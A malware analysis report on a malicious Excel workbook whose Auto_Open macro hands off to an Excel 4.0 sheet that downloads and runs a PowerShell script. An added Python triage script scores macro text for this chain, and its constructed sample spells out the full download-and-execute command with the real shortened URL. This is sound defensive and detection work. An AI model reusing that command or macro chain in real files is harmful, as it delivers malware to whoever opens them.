Malicious Office (OLE) / .XLSX — malware analysis report

Static analysis result for SHA-256 b6684b29d675a1ed…

MALICIOUS

Office (OLE) / .XLSX

Size: 86.0 KB
Created: 2020-10-25 18:24:14
Authoring application: Microsoft Excel
MD5: 0c7f1a2a2e26a8246e5d4267934fa118
SHA-1: 3fb7e0b79f7f92c02a2602ad0822b88f02bf99db
SHA-256: b6684b29d675a1ed40be5838eec35956908df48fae3cdfc76ac13c56723e6a02
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File

The sample contains both VBA and Excel 4.0 (XLM) macros. The VBA macro, which runs automatically when the workbook is opened (Auto_Open), hands control to an Excel 4.0 macro sheet. The Excel 4.0 macro assembles and executes a command line that uses a .NET WebClient to download a PowerShell script from 'https://cutt.ly/EhknIaM' to 'pw.ps1' and then runs that script. The downloaded script is itself a downloader: it is designed to retrieve and execute a second-stage payload. Because the URL goes through a link shortener, the real hosting server cannot be recovered from the document alone; the macro code and the shortened URL are the static indicators available here.
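Added worked example (not code from the original report and not part of oletools): a triage function that scores the two artifacts a tool such as olevba extracts (decoded VBA source and an XLM macro listing) for the chain described above: an auto-exec trigger, a VBA hand-off to Excel 4.0, an EXEC() of a PowerShell/WebClient download, and execution of the dropped script. The macro text below is constructed for illustration and is not the sample's real code; rule names, weights and thresholds are this example's own assumptions; the URL in the constructed listing is the report's indicator and is never fetched.

```python
"""Macro-text triage for an Office sample (added example, not the report's or
oletools' own code). Scores decoded VBA source plus an XLM macro listing for the
auto-exec -> XLM bridge -> EXEC(download) -> run-script chain. Rule ids, weights
and verdict thresholds are assumptions made for this example."""
import re
from typing import Dict, List, Tuple

# (rule id, weight, regex); every pattern is applied case-insensitively to both artifacts.
RULES: List[Tuple[str, int, str]] = [
    ("AUTOEXEC",   30, r"\b(?:Auto_Open|AutoOpen|Workbook_Open|Document_Open|AutoExec)\b"),
    ("XLM_BRIDGE", 25, r"\b(?:ExecuteExcel4Macro|Excel4MacroSheets|Application\.Run)\b"),
    ("XLM_EXEC",   30, r"=\s*(?:EXEC|CALL|REGISTER)\s*\("),      # XLM command / native-code primitives
    ("XLM_BUILD",  10, r"\b(?:FORMULA|FORMULA\.FILL|CHAR)\s*\("),  # command text assembled at run time
    ("POWERSHELL", 20, r"\bpowershell(?:\.exe)?\b"),
    ("DOWNLOADER", 25, r"Net\.WebClient|DownloadFile|DownloadString"),
    ("SCRIPT_RUN", 15, r"\bIEX\b|Invoke-Expression|-(?:File|enc|EncodedCommand)\b"),
    ("URL",        10, r"https?://[^\s'\")]+"),
    ("SHORTENER",  10, r"\b(?:cutt\.ly|bit\.ly|tinyurl\.com|t\.co|is\.gd)\b"),
]

# All four present means the complete download-and-execute chain is wired up.
CHAIN = {"AUTOEXEC", "XLM_BRIDGE", "XLM_EXEC", "DOWNLOADER"}


def triage(vba_source: str, xlm_listing: str) -> Dict:
    """Return score, verdict, chain flag, triggered rule ids, URLs and per-hit detail."""
    hits = []
    for where, text in (("vba", vba_source), ("xlm", xlm_listing)):
        for rule_id, _, pattern in RULES:
            for m in re.finditer(pattern, text, re.IGNORECASE):
                hits.append({"rule": rule_id, "where": where, "match": m.group(0)})
    triggered = {h["rule"] for h in hits}
    # Each rule counts once no matter how many times it fires.
    score = sum(w for rid, w, _ in RULES if rid in triggered)
    chain = CHAIN <= triggered
    if chain:
        score += 20
    verdict = "MALICIOUS" if score >= 80 else "SUSPICIOUS" if score >= 40 else "CLEAN"
    return {
        "score": score,
        "verdict": verdict,
        "chain": chain,
        "rules": sorted(triggered),
        "urls": sorted({h["match"] for h in hits if h["rule"] == "URL"}),
        "hits": hits,
    }


# Constructed inputs for illustration only; NOT the sample's real macro code.
# The URL is the report's own indicator and is never requested by this script.
VBA_SAMPLE = '''Sub Auto_Open()
    ' hand control to the Excel 4.0 macro sheet
    Application.Run "Macro1!Start"
End Sub
'''

XLM_SAMPLE = '''Sheet Macro1 (constructed XLM listing)
Auto_Open -> Macro1!A1
A1: ="powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('https://cutt.ly/EhknIaM','pw.ps1'); powershell -File pw.ps1"
A2: =EXEC(A1)
A3: =HALT()
'''

# A benign macro for comparison: formatting only, no auto-exec, no XLM, no network.
BENIGN_VBA = '''Sub FormatReport()
    Range("A1").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for label, vba, xlm in (("sample", VBA_SAMPLE, XLM_SAMPLE), ("benign", BENIGN_VBA, "")):
        r = triage(vba, xlm)
        print(f"{label}: {r['verdict']} score={r['score']} chain={r['chain']} "
              f"rules={r['rules']} urls={r['urls']}")
```

The verdict comes from which rules fire, not from how often they fire, so a long XLM sheet with many CHAR() cells scores the same as a short one; the chain bonus is what separates a document that merely contains PowerShell strings from one whose macros are wired to run them on open.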

Heuristics 4

  • ClamAV: Xls.Malware.Abracadabra-10031695-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Abracadabra-10031695-0
  • Auto_Open macro high OLE_VBA_AUTO
    The VBA project defines an Auto_Open procedure, so the macro code runs automatically as soon as the workbook is opened and macros are enabled; no further user action is needed.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename         Kind        Source                                                   Size
xlm_macros.txt   xlm-macro   oletools.olevba.extract_all_macros (XLM macro listing)   1451 bytes
                 SHA-256: a301ed75c8438893082ef958d4cadbca3ab5d48cff3e056cd9355244dfa6a845
macros.bas       vba-macro   oletools.olevba.extract_macros (decoded VBA source)      1020 bytes
                 SHA-256: c14dd6d2332aec42601f638d9220a7d42954f10b6b83884a1c68d4a74f82d1bb